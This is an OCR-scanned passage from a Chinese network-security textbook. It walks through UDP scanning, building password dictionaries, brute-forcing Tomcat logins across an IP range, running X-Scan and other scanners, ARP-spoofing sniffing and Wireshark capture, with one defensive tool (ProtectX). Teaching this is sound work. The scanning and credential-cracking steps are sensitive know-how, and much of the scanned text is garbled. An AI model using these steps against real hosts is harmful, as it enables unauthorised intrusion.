HTTP 代理 ,指针 等 都 存在 着 攻击 者 可 用 于 进行 跳跃 攻击 的 弱点 。 

(4) UDP 扫描 : 对 UDP 端口 扫描 ,寻找 开放 端口 。UDP 的 应 答 具 有 不 同方 式 , 为 了 发 
现 UDP 端口 ,攻击 者 常 发 送 空 UDP 数据 包 , 若 该 端口 正 处 于 监听 状态 ,将 发 回 一 个 错误 消 
息 或 不 理 肯 流 入 的 数据 包 ; 若 该 端口 关闭 ,通常 操作 系统 将 发 回 “ICMP 端口 不 可 到 达 ” 的 消 
息 ,于 是 就 可 发 现 一 个 端口 到 底 有 没有 打开 ,通过 排除 方法 确定 哪些 端口 是 打开 的 。 

以 下 示例 为 黑客 字典 的 生成 和 使 用 。 

黑客 字典 就 是 装 有 各 种 密码 的 破解 工具 ,通常 情况 下 ,只 要 知道 本 地 文件 的 内 容 就 可 以 
运用 黑客 字典 将 其 破解 。 当 然 ,黑客 字典 文件 的 好 坏 直 接 关系 到 黑客 是 否 能 破解 对 方 的 密 
码 , 以 及 花费 多 少时 间 破 解密 码 。 

例如 ,小 榕 黑客 字典 ”软件 可 根据 用 户 需要 任意 设 定 包含 字符 、 字 符 串 的 长 度 等 内 容 的 
黑客 字典 生成 器 。 并 使 用 生成 的 字典 文件 。 

主要 步骤 如 下 。 

(1) 运行 小 榕 字典 生成 器 ,选择 “字典 设置 "对 话 框 ,在 “设置 "选项 卡 中 ,可 选择 生成 字 
符 串 包含 的 字母 或 数字 及 其 范围 ,如 图 3-2 所 示 。 

(2) 切换 到 “选项 ”选项 卡 , 根 据 特殊 需要 选择 相应 设置 ,如 图 3-3 所 示 。 





设置 | 选 需 “| 文件 存放 位 置 | 高 级 进项 | 设置 。 选 页 | 文件 存放 位 置 | 高 级 选 需 | 










多 万 二 
二 售 @ 二 1 和 字 


宇和 东 ”人 | 习 至 氏 习 


厅 字 思 采用 大 马 形式 
厂 仅仅 首 字母 大 写 
厂 数字 在 字母 前 

厂 仅仅 使 用 下 间隔 


mE 三公 人 合用 名 


厂 符号 (0x20"Dx2E | 





|] Ey | 动 | 








图 3-2 小 榕 字典 设置 一 图 3-3 小 榕 字典 设置 二 
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(3) 切换 至 “高 级 选项 ”选项 卡 ,如 图 3-4 所 示 , 可 设置 字母 ,数字 或 符号 的 位 置 。 

(4) 切换 至 “文件 存放 位 置 " 选 项 卡 , 指 定 字 典 文件 保存 的 位 置 之 后 , 单 击 “ 确 定 ” 按 钮 ， 
会 显示 所 设置 的 字典 文件 属性 , 单 击 “开始 ?按钮 ,生成 扩展 名 为 . dic 的 字典 文件 ,如 图 3-5 
所 示 。 


















































第 1 位 : abcdeighijdmnopqrstuvwxyz 
FE 多 人 CT 
设 和 | 过 “| 文件 让 高 织 迁 项 | 第 3 位 abcdefghijdmnopqrstuvwxyz 
人 第 4 位 : 0123456789 
[本 和 区 EEC 和 | Fh 
Ri pz2 ps3 FT4 Ps Fs pr md 第 5 位 : Tr 
第 6 位 : 0123456789 
mT! m2 rs m4 ms pe rr pd 第 7 但 : abedefohijdmnoparstuwyz 
-符号 位 置 第 8 位 : 0123456789 
ne Qs 
单词 范例 : moodle 

厅 使 用 高 级 选项 生成 字典 。 厂 证 划 每 人 位置 自 计 行 丰 国 HE 
可 用 空间 : 959500K 一 开始 | 

图 3-4 小 榕 字典 设置 三 图 3-5 ”小 榕 字典 设置 四 


(5) 当 字典 文件 生成 后 ,就 可 以 使 用 弱 口 令 扫 描 器 加 载 刚 才 生成 的 字典 文件 进行 弱 口 
令 扫 描 了 。 以 下 几 步 是 对 Tomcat 进行 扫描 。 主 要 是 加 载 用 户 名 称 字典 、 密 码 字典 ,再 对 一 
定 IP 地 址 范围 内 的 主机 进行 弱 口 令 扫描 ,如 图 3-6 所 示 。 


rack Http://We¥.0r4F.Cn/BLoe by:Open 





jegére: | 190.168. 0 . 5 终 IEIP: | 190.168. 0 .254 
信息 设置 
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3-6 打开 Apache Tomcat Crack 并 设置 IP 地 址 范围 


weer 








(6) 打开 “设置 "选项 ,导入 字典 文件 。 单 击 “ 开 始 ” 按 钮 ,进行 扫描 。 若 发 现 活动 主机 ， 
即 可 对 主机 的 用 户 名 和 密码 进行 破解 ,扫描 结果 显示 在 最 下 方 的 状态 栏 上 ,如 图 3-7 所 示 。 


Apache Tomcat Crack Http://Wwg-0xdF- Cn/BLog 


起 拓 IP: | 190.168. 0 . 5 将 lEI?: | 190.168, 0 .254 Ee 











by:Open 


























端口 B55] 间隔 ; [5] 总 徐 延 时 : [L000] 这 纵 0 柯 陈 与 天时 视 同 剖 快 借 而 设 定 端口 轩 认 为 -8080 








图 3-7 扫描 结果 


j> 3.2.2 使 用 扫描 器 X-Scan 


X-Scan 是 国内 著名 的 综合 扫描 器 , 它 完全 免费 ,是 不 需要 安装 的 绿色 软件 ,界面 支持 中 
文 和 英文 两 种 语言 ,包括 图 形 界面 和 命令 行 方式 。 值 得 一 提 的 是 ,X-Scan 把 扫描 报告 和 安 
全 焦点 网 站 相连 接 , 对 扫描 到 的 每 个 漏洞 进行 "风险 等 级 ?评估 ,并 提供 漏洞 描述 .漏洞 溢出 
程序 ,方便 网 管 测试 、 修 补漏 洞 。 

X-Scan 采用 多 线程 方式 对 指定 IP 地 址 段 (或 单机 ) 进 行 安全 漏洞 检测 ,支持 插件 功能 ， 
提供 了 图 形 界面 和 命令 行 两 种 操作 方式 ,扫描 内 容 包括 : 远程 操作 系统 类 型 及 版 本 、 标 准 端 
口 状 态 及 端口 Banner 信息 ,CGI 漏洞 .IIS 漏洞 ,RPC 漏洞 ,SQL Server、FTP Server、SMTP 
Server、.POP3 Server NT Server 的 弱 口 令 用 户 ,NT 服务 器 的 NETBIOS 信息 等 。 扫 描 结 果 
保存 在 /log/ 目 录 中 ,index_* . htm 为 扫描 结果 索引 文件 。 

安装 和 使 用 X-Scan 的 具体 步骤 如 下 。 

(1) 搜索 和 下 载 X-Scan 3. 3-cn 工具 ,有 绿色 版 可 直接 解压 后 使 用 。 解 压 后 运行 xscan_ 
gui. exe 即 可 运行 X-Scan。 

(2) 参数 设置 。 单 击 “ 设 置 ”菜单 ,选择 “扫描 参数 ”命令 或 者 直接 单 击 工 具 栏 中 的 蓝 色 
按钮 进入 扫描 参数 设置 。 该 软件 所 有 的 重要 参数 都 是 在 “设置 "选项 的 “扫描 参数 "中 设置 
的 ,如 图 3-8 所 示 。 

可 以 单 击 “ 示 例 ” 来 查看 ,在 指定 IP 范围 内 应 该 输入 的 内 容 。 在 图 3-8 中 的 “指定 IP 范 
围 ” 中 输入 10. 1. 152. 1-10. 1. 152. 254, 设 置 本 机 所 在 网 段 的 IP 范围 。 














一 一 多 





|10.1. 152. 1-10.1. 1S2.254 





图 3-8 X-Scan 扫描 参数 


(3) 在 “全 局 设置 ?选项 的 “扫描 模块 ?选项 中 ,选择 “开放 服务 ”NT-Server 弱 口 令 ” 
“NetBios 信息 “SQL-Server 弱 口 令 ”“FTP 弱 口 令 ? 等 几 个 复 选 框 ,如 图 3-9 所 示 。 











3-9 X-Scan 扫描 参数 选项 设置 


具体 可 按 需 要 自行 设置 。 在 “并 发 扫描 ”选项 中 的 “最 大 并 发 主机 数量 "和 “最 大 并 发 线 
程 数量 中 ”, 分 别 输入 10 和 100, 理 论 上 数值 越 大 越 快 ,但 是 实际 上 还 得 考虑 计算 机 及 网 络 因 
素 , 所 以 在 此 处 暂时 设置 为 10 和 100。 

(4)“ 扫 描 报 告 用 于 设置 生成 的 报告 类 型 ,有 三 种 类 型 可 选 : HTML XML TXT。 一 


和 一 一 


故国 wes 








般 建议 使 用 HTML。 在 “其 他 设置 ”选项 中 ,要 选择 “无 条 件 扫 描 ” 单 选 按 钮 ,不 然 有 可 能 会 
出 现 得 不 到 任何 数据 的 情况 ,如 图 3-10 所 示 。 











图 3-10 X-Scan 扫描 其 他 设置 


(5) 在 “插件 设置 "选项 中 ,主要 设置 两 个 选项 ,其 他 基本 可 以 采用 默认 值 。 在 “端口 相 
关 设 置 "选项 中 ,可 以 默认 扫描 一 些 主要 的 端口 ,也 可 以 自 定义 添加 。 方 法 是 : 在 “ 待 测 端 
口 ? 选 项 中 ,在 已 有 的 端口 最 后 面 加 一 个 逗号 和 想 要 扫描 的 端口 号 。 在 “SNMP 相关 设置 ”中 
选择 全 部 复 选 框 ,如 图 3-11 所 示 。 








图 3-11 X-Scan SNMP 相关 设置 








(6) 在 “NETBIOS 相关 设置 ”选项 中 ,选择 “注册 表 敏感 键 值 ”“ 服 务 器 时 间 ”“ 共 享 资源 
列表 ”用 户 列表 ”“ 本 地 组 列表 ” 复 选 框 ,如 图 3-12 所 示 。 











图 3-12 X-Scan NETBIOS 相关 设置 


(7) 在 “字典 文件 设置 "选项 中 可 选择 需要 的 破解 字典 文件 。 其 他 采用 默认 值 , 单 击 “ 确 
定 ” 按 钮 。 

(8) 选择 “文件 ”一 开始 扫描 ”命令 。 接 下 来 的 事情 就 是 等 待 扫描 结束 。 扫 描 完 成 后 ， 
相关 的 信息 会 显示 在 界面 上 ,而 且 软 件 会 自动 生成 HTML 文件 的 报告 。 在 软件 窗口 中 的 左 
边 ,为 扫描 的 结果 信息 条 目 , 展 开 条 目 , 可 以 得 到 更 详细 的 信息 。 

从 图 3-13 可 以 看 到 关于 被 扫描 主机 的 各 种 信息 ,如 系统 类 型 .开放 服务 、 开 放 端 口 、 对 


| 日- 目 139/tep 
| 一 轩 metbios-ssn" 服 务 可 能 运行 于 该 六 


ep 
| 一 轩 icrosoftrds" 服 务 可 能 运行 于 该 庙 ! 
日 - 目 2l/tep 


| | 一 轩 "Tp" 服务 运行 于 该 端口 . 
-© 110/tep 
| | 8- 10z7/tep 
| 由 -图 135/tep 
| | 外 © l025/tep 





”一 肯 ftp/[ 品 令 与 用 户 名 相同 ] (0.1.152.12: 
| 一 县 anonymous/[ 空 口令 ] (10.1.152 12:21) | 


3-13 XX-Scan 扫描 结果 左 侧 部 分 图 
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应 端口 的 服务 、 弱 口令 、 空 口令 ,主机 共享 资源 漏洞 等 信息 ,为 下 一 步 的 入 侵 指明 道路 。 在 
软件 的 右 下 窗口 为 扫描 的 进度 信息 ,分 为 “普通 信息 ”漏洞 信息 ”错误 信息 ”三 个 ,实用 性 不 
大 。 最 有 用 的 便 是 软件 生成 的 报告 文件 。 这 里 有 所 有 的 漏洞 信息 及 详细 解释 ,虽然 有 些 是 
英语 ,但 是 解释 还 是 很 详尽 的 。 可 根据 自己 的 需求 选择 下 一 步 要 干 的 “坏事 ”"。 该 报告 文件 
存 于 X-Scan-v3. 3-cn\X-Scan-v3. 3\log\ 文 件 夹 ,index_* . htm 为 扫描 结果 索引 文件 。 


j* 3.2.3 Free Port Scanner、ScanPort 等 常见 扫描 工具 


黑客 人 侵 前 常常 利用 一 些 专 用 扫描 工具 对 目标 主机 进行 扫描 ,目前 可 以 用 来 扫描 端口 
的 工具 非常 多 ,下 面 介绍 几 种 常见 的 工具 。 





中. Free Port Scanner 的 使 用 


Free Port Scanner 是 一 款 小 巧 ,高速 、 使 用 简单 的 免费 的 端口 扫描 工具 ,用 户 可 以 快速 
扫描 全 部 端口 ,也 可 以 制定 扫描 范围 。 使 用 Free Port Scanner 进行 端口 扫描 ,具体 操作 步 又 
如 下 。 

(1) 打开 软件 主 界 面 。 在 IP 文本 框 中 输入 目标 主机 的 IP 地 址 ,再 选择 Show Closed 
Ports 复 选 框 。 再 单 击 Scan 按钮 , 即 可 扫描 到 目标 主机 的 全 部 端口 ,其 中 四 标记 是 开启 的 端 
口 , 如 图 3-14 所 示 。 


Free Port Scar 
| Fes 








FreelPortlScanner® 

















Fa | LEARN MORE 





tp siaple mail transfer 
donsin domein name server, nene-dongin server 
htt hypertext transfor pretocel，world wide 
pop3 op version 3, postoffice v.3, post offi 
pap dee endpoint resolution, location servie 
metbiosas netbios nene service 

metbies-dm netbios datagren service 

natbies-ssn netbios sersion cerviee 

Mtps secure http (ssl), http Brotecel over tl 
miereseftrds nierosoft-ds 

socks socks 

-sal-s mierosoft-sql-server 

aas Active 


os 
comaon http proxy/secend web server port, 


一 ] 


ys 有 
httpralt 














3-14 ”Free Port Scanner 扫描 结果 


第 3 章 ”黑客 攻防 与 检测 防御 | 











(2) 针对 目标 主机 开启 的 端口 进行 扫描 。 在 IP 文本 框 中 输入 目标 主机 的 IP 地 址 ,再 取 
消 已 选择 的 Show Closed Ports 复 选 框 。 扫 描 完毕 后 可 显示 扫描 结果 ,从 扫描 结果 就 可 以 看 
到 目标 主机 开启 的 端口 。 


12. ScanPort 的 使 用 


端口 扫描 工具 ScanPort 是 一 个 小 巧 的 网 络 端口 扫描 工具 ,并 且 是 绿色 版 不 用 安装 即 可 
使 用 。 同 时 还 可 以 探测 IP 及 端口 ,速度 比较 快 , 且 支持 用 户 自 设 IP 端口 功能 ,灵活 性 很 强 。 
具体 操作 步骤 如 下 。 

(1) 设置 起 始 IP 地址 、 结 束 IP 地 址 及 要 扫描 的 
端口 号 。 

(2) 单 击 “扫描 ”按钮 ,开始 扫描 ,从 扫描 结果 中 
可 以 看 出 IP 地 址 段 中 开启 的 计算 机 端口 ,如 图 3-15 
所 示 。 


信息 设置 
起 BI? :1 168 1 0 


2 92. 168.1 55: 139 
端口 号 -0.139.000-065 | | |192. 168.1 55: 445 
起 时 门 20 理沙 
线 本 数 [ 10 
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Es. SSS 扫描 器 的 使 用 


Shadow Security Scanner(SSS) 是 一 款 来 自 俄 罗 图 3-15 ”ScanPort 的 扫描 结果 
斯 的 安全 漏洞 扫描 软件 ,可 以 对 很 大 范围 内 的 系统 
漏洞 进行 安全 ,高效 .可 靠 的 安全 检测 ,对 系统 全 部 扫描 之 后 ,SSS 可 以 对 收集 的 信息 进行 
分 析 ,发 现 系 统 设 置 中 容易 被 攻击 的 地 方 和 可 能 的 错误 ,得 出 对 发 现 问题 的 可 能 的 解决 
方法 。 








利用 SSS 扫描 器 对 系统 进行 扫描 ,具体 操作 步 又 如 下 。 
(1) 运行 SSS 扫描 器 , 单 击 工 具 栏 中 的 New session 按 


ae 一 一 一 the rule 
Corpe Soon 钮 。 打 开 新 建 项 目 向 导 窗 口 。 


图 Cieale defauk ue 


Ploase, erler new dle name: | (2) 设置 扫描 规则 。 用 户 可 以 选择 预 设 的 扫描 规则 ,也 
EE 以 音 击 Add rale 接 乌 深 加 新 规则 。 

(3) 在 Create new rule 对 话 框 中 ,创建 新 的 扫描 规则 ， 
根据 提示 输入 信息 ,如 图 3-16 所 示 。 单 击 OK 按钮 ,设置 扫 
描 选 项 ,如 图 3-17 所 示 。 

(4) 回 到 步骤 (1) 中 打开 的 窗口 , 单 击 Next 按钮 ,再 单 
击 Add host 按钮 ,添加 扫描 的 目标 计算 机 ,如 图 3-18 所 示 。 

在 图 3-18 中 ,选择 Host 单 选 按钮 ,可 添加 单一 目标 计算 机 的 IP 地 址 或 计算 机 名 称 。 
选择 Hosts range 单 选 按钮 ,可 添加 一 个 IP 地 址 范围 ; 选择 Hosts from file 单 选 按钮 ,可 通 
过 指定 已 有 的 目标 计算 机 列表 文件 添加 目标 计算 机 ; 选择 Host groups 单 选 按 钮 , 则 通过 添 
加 工作 组 的 方式 添加 目标 计算 机 ,并 设置 登录 的 用 户 名 和 密码 。 

在 图 3-18 中 , 单 击 Add 按钮 , 回 到 类 似 步 又 (1) 中 打开 的 窗口 ,完成 扫描 项 目的 创建 。 
并 单 击 Next 按钮 ,返回 SSS 主 界面 。 

(5) 单 击 Start scan 按钮 ,开始 对 目标 计算 机 进行 扫描 ,可 在 Statistics 选项 卡 中 查看 扫 
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3-16 在 SSS 扫描 器 中 创建 
新 的 扫描 规则 
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图 3-17 SSS 扫描 器 中 设置 扫描 规则 

















Caw) ewes ) 
图 3-18 SSS 扫描 器 中 添加 目标 计算 机 





描 进程 ,如 图 3-19 所 示 。 

(6) 在 图 3-19 中 ,切换 至 Vulnerabilities 选项 卡 。 查 看 危险 程序 ,补救 措施 等 内 容 。 单 
击 左 侧 的 DoS Checker 选项 .选择 检测 的 项 目 。 如 图 3-20 所 示 ,DoS 安全 性 检测 中 设置 扫描 
的 线程 数 之 后 , 单 击 Start 按钮 ,开始 DoS 检测 ,并 可 以 查看 检测 结果 。 

(7) 返回 主 界面 ,选择 Tools-~Options 菜单 。 设 置 SSS 选项 ,如 图 3-21、 图 3-22 所 示 。 
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图 3-19 SSS 扫描 器 开始 扫描 
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图 3-20 SSS 扫描 器 中 进行 DoS 安全 性 检测 





六 Security Scanner options 【EL > 一 | 
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3-21 SSS 扫描 器 中 设置 常规 选项 


网 络 安全 技术 基础 
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图 3-22 ”SSS 扫描 器 中 设置 扫描 选项 


> 3.2.4 用 ProtectX 实现 扫描 的 反击 与 追踪 


ProtectX 是 一 个 在 用 户 连接 网 络 时 保护 计算 机 的 工具 ,可 以 同时 监视 20 个 端口 ,防止 
黑客 和 人 侵 。 假 如 任何 人 尝试 和 人 侵 连 接 到 你 的 计算 机 ,ProtectX 即 会 发 出 声音 警告 并 将 入 侵 
者 的 IP 地 址 记录 下 来 。 


外 ProtectX 实用 组 件 概述 


安装 完成 后 ,需要 重启 操作 系统 才能 正常 使 用 。 在 Windows 系统 的 通知 栏 中 ,可 以 看 
到 ProtectX 的 运行 图 标 。 双 击 该 图 标 即 可 显示 ProtectX 运行 主 界 面 ,窗口 中 显示 的 是 当前 
主机 的 状态 信息 ,如 图 3-23 所 示 。 











==| RrotectX 


图 3-23 ”ProtectX 初始 界面 
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ProtectX 提供 了 几 项 实用 功能 组 件 , 依 次 是 端口 安全 (Port Secrity)、 特 洛 伊 安 全 
(Trojan Secrity) .IdentD 服务 (IdentD Server) 等 。 

(1) 端口 安全 。 端 口 安全 就 是 端口 扫描 监视 器 ,在 TCP 端口 1 上 监听 ,如 果 1 号 端口 被 
扫描 , 则 Port Secrity 将 会 报警 。 同 时 ProtectX 即 可 反 跟 踪 对 方 ,查询 其 域名 .追溯 路 由 信 
息 .并 显示 所 拦截 到 的 扫描 信息 。 

(2) 特洛伊 安全 。 是 指 在 一 些 木马 常用 端口 上 进行 监听 ,一 旦 发 现 有 人 试图 连接 这 些 
端口 , 即 进行 报警 。 

(3) IdentD 服务 。 可 在 计算 机 上 打开 一 个 安全 的 IdentD 服务 ,一 般 用 户 最 好 不 要 打开 
这 个 服务 。 


Nz: 防御 扫描 器 入 侵 


有 了 ProtectX 的 保护 ,对 于 一 般 的 扫描 攻击 ,就 不 用 太 担心 了 。 不 过 ,仅仅 依靠 
ProtectX 工具 还 远 远 不 够 ,还 需要 提前 做 好 防御 扫描 入 侵 的 准备 ,如 进行 Windows 系统 注 
册 表 设置 等 。 


| 3.3 ”常见 的 嗅 探 工具 | 


嗅 探 工 具 可 以 窃听 网 络 上 流 经 的 数据 包 , 也 就 是 网 络 监 听 。 用 集线器 Hub 组 建 的 网 络 
是 基于 共享 的 原理 的 ,局 域 网 内 所 有 的 计算 机 都 接收 相同 的 数据 包 , 而 网 卡 构造 了 硬件 的 
“过 滤器 ”, 通 过 识别 MAC 地 址 过 滤 掉 和 自己 无 关 的 信息 , 嗅 探 程 序 只 需 关 闭 这 个 过 滤器 ， 
将 网 卡 设置 为 “混杂 模式 ”, 就 可 以 进行 嗅 探 。 用 交换 机 Switch 组 建 的 网 络 是 基于 “交换 ” 原 
理 的 ,交换 机 不 是 把 数据 包 发 到 所 有 的 端口 上 ,而 是 发 到 目的 网 卡 所 在 的 端口 ,在 这 种 情况 
下 , 嗅 探 起 来 会 麻烦 一 些 , 嗅 探 工具 一 般 利 用 "ARP 欺骗 "的 方法 ,通过 改变 MAC 地 址 等 手 
段 ,欺骗 交换 机 将 数据 包 发 给 自己 ,分析 完毕 再 转发 出 去 。 

嗅 探 工具 是 黑客 使 用 最 频繁 的 工具 。 


PP 3.3.1 网 络 监听 概述 


网 络 监听 是 指 通过 某 种 手段 监视 网 络 状态 .数据 流 以 及 网 络 上 传输 信息 的 行为 。 网 络 
监听 是 主机 的 一 种 工作 模式 。 在 此 模式 下 ,主机 可 以 接收 到 本 网 段 在 同一 条 物理 通道 上 传 
输 的 所 有 信息 ,而 不 管 这 些 信 息 的 发 送 方 和 接收 方 是 谁 。 此 时 ,如 果 两 台 主 机 进行 通信 的 信 
息 没有 加 密 , 只 要 使 用 某 些 网 络 监听 工具 就 可 以 轻而易举 地 截取 包括 口令 和 账号 在 内 的 信 
息 资料 。 网 络 监听 可 以 在 网 上 的 任何 一 个 位 置 实施 ,如 局 域 网 中 的 一 台 主 机 、 网 关 或 远程 网 
服务 器 等 。 

网 络 监听 工具 称 为 嗅 探 器 CSniffer) , 嗅 探 器 可 以 是 软件 ,也 可 以 是 硬件 。 硬 件 的 Sniffer 
也 称 为 网 络 分 析 仪 。 网 络 监听 技术 原本 是 提供 给 网 络 安全 管理 人 员 进 行 管理 的 工具 ,监视 
网 络 的 状态 ,数据 流动 情况 以 及 网 络 上 传输 的 信息 等 。 黑 客 利用 监听 技术 攻击 他 人 计算 机 
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系统 ,获取 用 户口 令 ,捕获 专用 的 或 者 机 密 的 信息 ,这 是 黑客 实施 攻击 的 常用 方法 之 一 。 例 
如 ,以 太 网 协议 工作 方式 是 将 要 发 送 的 数据 包 发 往 连接 在 一 起 的 所 有 主机 , 包 中 包含 着 应 该 
接收 数据 包 主机 的 正确 地 址 ,只 有 与 数据 包 中 目标 地 址 一 致 的 那 台 主机 才能 接收 。 但 是 , 当 
主机 工作 监听 模式 下 ,无 论 数据 包 中 的 目标 地 址 是 什么 ,主机 都 将 接收 ,当然 只 能 监听 经 过 
自己 网 络 接口 的 那些 包 。 

要 使 主机 工作 在 监听 模式 下 ,需要 向 网 络 接口 发 出 1/O 控制 命令 ,将 其 设置 为 监听 模 
式 。 在 UNIX 系统 中 ,发 送 这 些 命令 需要 超级 用 户 的 权限 。 在 Windows 系列 操作 系统 中 ， 
则 没有 这 个 限制 。 要 实现 网 络 监 听 , 用 户 还 可 用 相关 的 计算 机 语言 编写 网 络 监听 程序 ,也 可 
以 使 用 一 些 现成 的 监听 软件 ,从 事 网 络 安全 管理 的 网 站 都 可 以 下 载 。 

为 了 对 Sniffer 的 工作 原理 有 一 定 的 了 解 , 先 简单 地 介绍 一 下 网 卡 的 工作 原理 。 


EL: 网 卡 工 作 原 理 


网 卡 工作 在 数据 链 路 层 ,在 该 层 上 ,数据 是 以 帧 (Frame) 为 单位 传输 的 , 帧 由 几 部 分 组 
成 ,不 同 的 部 分 执行 不 同 的 功能 。 其 中 , 帧 头 包括 数据 的 目的 MAC 地 址 和 源 MAC 地 址 。 

数据 通过 特定 的 网 卡 驱动 程序 的 软件 组 成 数据 帧 ,然后 通过 网 卡 发 送 到 类 似 网 线 的 传 
输 媒 体 上 ,最 后 到 达 目 的 机 器 ,在 目的 机 器 上 执行 相反 的 过 程 。 

目的 机 器 的 网 卡 收 到 传输 来 的 数据 ,认为 应 该 接收 ,就 在 接收 后 产生 中 断 信号 通知 
CPU ,认为 不 该 接收 就 丢弃 ,所 以 不 该 接收 的 数据 网 卡 被 截断 ,计算 机 根本 就 不 知道 。CPU 
得 到 中 断 信 号 后 产生 中 断 处 理 , 操 作 系 统 根据 网 卡 驱动 程序 中 设置 的 网 卡 中 断 程 序 地 址 调 
用 驱动 程序 接收 数据 。 

网 卡 收 到 传输 来 的 数据 时 , 先 接收 数据 头 的 目的 MAC 地 址 。 通 常情 况 下 , 像 收 信 一 
样 ,只 有 收 信人 才 去 打开 信件 ,同样 网 卡 只 接收 和 自己 的 MAC 地 址 相关 的 信息 包 或 者 是 广 
播 包 (多 播 等 ) ,其 他 的 数据 包 直接 被 丢弃 。 

网 卡 还 可 以 工作 在 另 一 种 模式 中 , 即 混杂 模式 (Promiscuous)。 此 时 网 卡 进 行 包 过 滤 ， 
不 同 于 普通 模式 ,混杂 模式 不 关心 数据 包头 的 内 容 , 让 所 有 经 过 的 数据 包 都 传递 给 操作 系统 
处 理 , 可 以 捕获 网 络 上 所 有 的 数据 帧 。 如 果 一 台 机 器 的 网 卡 被 配置 成 这 样 的 方式 ,那么 这 个 
网 卡 ( 含 软件 ) 就 是 一 个 嗅 探 器 。 


12. 网 络 监听 原理 


Sniffer 的 工作 过 程 基本 上 分 为 三 步 : 把 网 卡 置 为 混杂 模式 ,捕获 数据 包 和 分 析 数据 包 。 

下 面 根据 不 同 的 网 络 状 况 ,介绍 Sniffer 的 工作 情况 。 

(1) 集线器 式 。 表 示 该 网 络 通过 共享 Hub 连接 。 数 据 传输 是 通过 广播 方式 在 网 络 中 进 
行 的 。 默 认 情 况 下 ,每 台 在 网 络 中 的 计算 机 都 能 接收 到 广播 数据 ,并 检查 收 到 的 数据 帧 中 的 
地 址 是 否 和 自己 的 地 址 匹配 :如 不 同 , 则 把 数据 帧 丢弃 。 在 这 样 的 网 络 环境 下 ,只 要 把 接收 
计算 机 的 网 卡 置 于 混杂 模式 ,那么 就 不 会 丢弃 数据 帧 ,而 会 把 数据 帧 交 给 操作 系统 进行 分 
析 ,完成 网 络 监听 过 程 。 

(2) 交换 机 式 。 通 过 交换 机 连接 的 网 络 , 申 于 交换 机 的 工作 原理 和 Hub 不同, 交换 机 内 
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部 的 端口 都 类 似 “ 桥 接 ”( 按 端口 和 MAC 地 址 对 应 进行 数据 转发 ) ,也 就 是 说 ,在 交换 机 连接 
的 网 络 环境 下 ,在 计算 机 上 安装 了 监听 软件 ,该 计算 机 也 只 能 收 到 发 给 自己 的 数据 帧 ,无 法 
监听 其 他 计算 机 所 收 到 的 数据 。 因 此 ,在 交换 环境 下 比 Hub 连接 的 网 络 安全 很 多 。 

现在 许多 交换 机 都 支持 映像 的 功能 ,能 够 把 进入 交换 机 的 所 有 数据 都 映射 到 监控 端 
口 ,同样 可 以 监听 所 有 的 数据 ,从 而 进行 数据 分 析 处 理 。 要 实现 这 个 功能 必须 能 对 交换 机 
进行 设置 才 可 以 ,所 以 在 交换 机 的 网 络 环境 下 对 黑客 来 说 很 难 实现 监听 。 但 是 黑客 往往 
通过 ARP 欺骗 .破坏 交换 机 的 工作 模式 (使 交换 机 也 共享 式 数 据 交 换 ) 等 ,来 实现 网 络 
监听 。 


PP 3.3.2 ”Sniffer 演示 


LB . Sniffer 工具 简介 


Sniffer 分 为 软件 和 硬件 两 种 ,软件 的 Sniffer 有 Sniffer Pro、 Network Monitor、 Wireshark、 
PacketBone 等 ,其 优点 是 易于 安装 部 署 ,易于 学 习 使 用 ,同时 也 易于 交流 ; 缺点 是 无 法 抓 取 
网 络 上 所 有 的 数据 , 某 些 情况 下 也 就 无 法 真正 了 解 网 络 的 故障 和 运行 情况 。 硬 件 的 Sniffer 
通常 称 为 协议 分 析 仪 ,一 般 都 是 商业 性 的 ,价格 也 比较 昂贵 ,但 会 具备 支持 各 类 扩展 的 链 路 
捕获 能 力 以 及 高 性 能 的 数据 实时 捕获 分 析 的 功能 。 

一 般 使 用 Sniffer Pro 和 Wireshark 两 个 软件 。 

(1) Sniffer Pro 网 络 协议 分 析 软 件 支持 各 种 平台 ,性 能 优越 ,可 以 监视 所 有 类 型 的 网 络 
硬件 和 拓扑 结构 ,具备 出 色 的 监测 和 分 辨 能 力 ,智能 地 扫描 从 网 络 上 捕获 的 信息 以 及 检测 网 
络 异常 现象 ,应 用 用 户 自 定义 的 试探 程序 ,自动 对 每 种 异常 现象 进行 归 类 ,并 给 出 一 份 警 告 、 
解释 问题 的 性 质 和 提出 建议 的 解决 方案 。 

(2) Wireshark 是 一 款 开源 的 网 络 协 议 分 析 器 ,可 以 运行 在 UNIX 和 Windows 上 。 
Wireshark 可 以 实时 检测 网 络 通信 数据 .也 可 以 检测 其 捕获 的 网 络 通信 数据 快照 文件 。 可 以 
通过 图 形 界面 浏览 这 些 数据 ,也 可 以 查看 网 络 通信 数据 包 中 每 一 层 的 详细 内 容 。Wireshark 
拥有 许多 强大 的 特性 ,包含 有 富 显 示 过 滤器 语言 (Rich Display Filter Language) 和 查看 TCP 
会 话 重 构 流 的 能 力 , 支 持 上 百 种 协议 和 媒体 类 型 。 


12. Wireshark 的 使 用 


首先 下 载 安 装 Wireshark, 要 注意 是 32 位 还 是 64 位 系统 。 要 安装 WinPcap 和 
USBPcap 抓 包工 具 。 其 中 新 的 工具 USBPcap, 可 以 获取 USB 设备 的 数据 ,如 , 抓 取 3G 无 线 
网 卡 的 数据 包 。 

启动 Wireshark, 如 图 3-24 所 示 ,选择 通过 哪 一 个 网 卡 来 捕获 数据 包 , 示 例 中 采用 的 是 
“本 地 连接 2”, 单 击 Start 按钮 或 选择 Capture 习 Start 命令 。 

捕获 到 的 数据 如 图 3-25 所 示 。 第 一 部 分 是 数据 包 统 计 窗 ,可 以 按照 不 同 的 参数 排序 ， 
如 按 源 IP 地 址 排序 。 如 果 想 查看 某 个 数据 包 的 消息 信息 , 单 击 该 数据 包 , 在 协议 分 析 窗 中 
显示 详细 信息 ,主要 是 各 层 数 据 头 信息 。 最 下 面 的 是 该 数据 包 的 具体 数据 。 
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图 3-24 ”Wireshark 初始 界面 
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男生 厦 面 可 | 巴 四 % 多 | 以 9 史 中 守 业 || 目 国 |QQQDI 三 四 - 











Filter: | Erpression.. Clesr Apply Save 





629 91.751334 10.234.0.79 10.230.10.227 TcCP 60 61343-3389 [ACK] Seq=3 
630 91.890612 10.230.10.227 10.234.0.79 TPKT 1514 Continuation jd 
631 91.890617 10.230.10.227 10.234.0.79 TPKT 1514 Continuation 

637 91.R90620 10-230-10-227 10.234-0-79 TPKT 291 cnnrinuarinn | 





Frame 1: 1514 bytes on wire C12112 bits), 1514 bytes captured (12112 bits) on jnterface 0 
Ethernet II1, Src: Dell_f9:5d:8e (84:2b:2b:f9:5d:8e), Dst: Fujianst_6b:2d:01 (14:14:4b:6b:2d 

